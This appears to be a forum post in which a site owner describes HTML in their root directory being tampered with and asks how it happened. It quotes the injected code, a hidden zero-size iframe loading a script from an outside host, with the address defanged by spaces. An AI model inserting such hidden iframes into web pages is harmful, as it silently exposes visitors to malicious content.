no applications. I use notepad to write my html. its the root
directory that was tampered with. the code entered was ill formed, it
was inserted after a <table> but before the first <tr>:

<table align="center" border="4" bordercolor="blue"
background="egiftshop_files/bckgrnd_blue.jpg"   width="90%><iframe
src="ht tp://me ga-statistic.net/1/in.cgi?2" width="0" height="0"
frameborder="0"></iframe><!--  bgcolor="#91A4EB"  outer table for
frame-->
<tr><!--outer table for frame 1st row-->
<td><!--outer table for frame 1st row-->

I don't think as a result it was "clickable" most likely a bot that
blindly inserted code. I don't understand how it got permission. I
doubt my password is compromised.
